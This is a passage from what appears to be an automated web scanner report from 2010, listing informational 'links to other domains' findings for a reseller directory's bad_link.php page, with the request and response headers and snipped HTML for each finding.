Content-Length: 10037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.mediaplazza.com/sysMaster.php?a=movil24"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.50. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=14

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.datingrev.com/cgi/go.cgi?where=0815

Request

GET /bad_link.php?id=14 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.datingrev.com/cgi/go.cgi?where=0815"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.51. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=28

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.nicline.com/

Request

GET /bad_link.php?id=28 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.nicline.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.52. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=31

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.camsense.com/link.html?ref=1399934

Request

GET /bad_link.php?id=31 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.camsense.com/link.html?ref=1399934"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.53. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=19

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939

Request

GET /bad_link.php?id=19 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.54. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=11

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.reseller-products.com/

Request

GET /bad_link.php?id=11 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.reseller-products.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.55. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=45

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.dograecorp.com/

Request

GET /bad_link.php?id=45 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.dograecorp.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.56. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=37

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.neondollars.com/track/harrye:wmref:neondollars/

Request

GET /bad_link.php?id=37 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.neondollars.com/track/harrye:wmref:neondollars/"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.57. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=13

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase
http://validator.w3.org/check?uri=referer

Request

GET /bad_link.php?id=13 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.58. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=20

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.ian.com/ian/signup/home.jsp?cid=104772

Request

GET /bad_link.php?id=20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.ian.com/ian/signup/home.jsp?cid=104772"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.59. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=12

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase

Request

GET /bad_link.php?id=12 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.fatcow.com/join/index.bml?AffID=570603&LinkName=ResellerBase"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.60. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=7

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.proxyonline.info/

Request

GET /bad_link.php?id=7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.proxyonline.info"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.61. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=18

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425

Request

GET /bad_link.php?id=18 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.62. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=6

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.whitelabeldropshipper.com/

Request

GET /bad_link.php?id=6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.whitelabeldropshipper.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.63. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=39

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.webcams.com/affiliate/?ref=reseller

Request

GET /bad_link.php?id=39 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.webcams.com/affiliate/?ref=reseller"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.64. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=15

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack=

Request

GET /bad_link.php?id=15 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.shareasale.com/r.cfm?b=81070&u=262424&m=12653&urllink=&afftrack="><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.65. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=10

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.telebay.com/0815

Request

GET /bad_link.php?id=10 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.telebay.com/0815"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.66. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=30

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.spacash.com/?account=resellerbase&fee=flat

Request

GET /bad_link.php?id=30 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
